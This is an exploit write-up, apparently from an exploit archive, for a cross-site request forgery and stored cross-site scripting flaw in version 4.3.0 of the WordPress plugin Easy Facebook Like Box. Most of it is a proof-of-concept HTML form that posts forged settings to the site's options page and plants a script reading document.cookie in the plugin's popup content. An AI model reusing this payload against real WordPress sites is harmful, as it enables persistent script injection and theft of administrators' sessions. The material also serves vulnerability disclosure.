###################### # Exploit Title : WordPress Plugin Easy Facebook Like Box 4.3.0- Cross-Site Request Forgery / Persistent Cross-Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : https://wordpress.org/plugins/easy-facebook-likebox/ # Category: [ Webapps ] # Tested on: [ Win ] # Version: 4.3.0 # Date: 2016/11/19 ###################### # # PoC: # CSRF and stored XSS vulnerability in Wordpress plugin Easy Facebook Like Box 4.3.0 # The Code for CSRF.html is : <form method="post" action="http://localhost/wp/wp-admin/options.php"> Like box pup up settings </br> <input type='hidden' name='option_page' value='efbl_settings_display_options' /> <input type="hidden" name="action" value="update" /> <input type="hidden" id="_wpnonce" name="_wpnonce" value="aa27b52873" /> <input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=easy-facebook-likebox&amp;tab=autopopup" /> </br> Enable PopUp<input type="checkbox" id="efbl_enable_popup" name="efbl_settings_display_options[efbl_enable_popup]" value="1" checked /> </br> PopUp content<textarea id="efbl_popup_shortcode" name="efbl_settings_display_options[efbl_popup_shortcode]" rows="5" cols="50" placeholder=""> For Testing D:<script>alert(document.cookie)</script></textarea><br /> </br> <input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" /> </form> # ###################### # Discovered by : Mojtaba MobhaM # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : http://persian-team.ir ######################